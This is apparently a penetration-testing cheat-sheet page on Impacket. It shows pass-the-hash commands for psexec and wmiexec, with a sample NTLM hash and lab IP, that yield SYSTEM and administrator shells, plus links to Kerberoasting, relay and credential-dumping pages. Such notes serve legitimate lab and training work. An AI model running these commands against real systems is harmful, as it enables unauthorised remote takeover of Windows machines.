Impacket

Pass-the-Hash

psexec uploads a service executable to a writable share, registers it as a service, and starts it—this requires write access to a share. If no argument is specified at the end of the command, it runs cmd.exe by default giving us a SYSTEM shell:

# SYSTEM shell
$ impacket-psexec -hashes :7a38310ea6f0027ee955abed1762964b Administrator@192.168.233.212
...
C:\Windows\system32> whoami
nt authority\system

# Specify a command
$ impacket-psexec -hashes :7a38310ea6f0027ee955abed1762964b Administrator@192.168.233.212 <command>

wmiexec uses Windows Management Instrumentation (WMI) to execute commands remotely without needing to upload files or write to shares (stealthier and faster). If no argument is specified at the end of the command, it runs cmd.exe by default giving us a user shell:

# Administrator shell
$ impacket-wmiexec -hashes :7a38310ea6f0027ee955abed1762964b Administrator@192.168.233.212
...
C:\>whoami
files02\administrator

AS-REPRoasting

See how to use impacket-GetNPUsers here.

Kerberoasting

See how to use impacket-GetUserSPNs here.

NTMLv2 Relay

See how to use impacket-ntlmrelayx here.

Local SAM Dump

See how to use impacket-secretsdump here.

PreviousBloodHound NextLDAPsearch

Last updated 1 month ago

Was this helpful?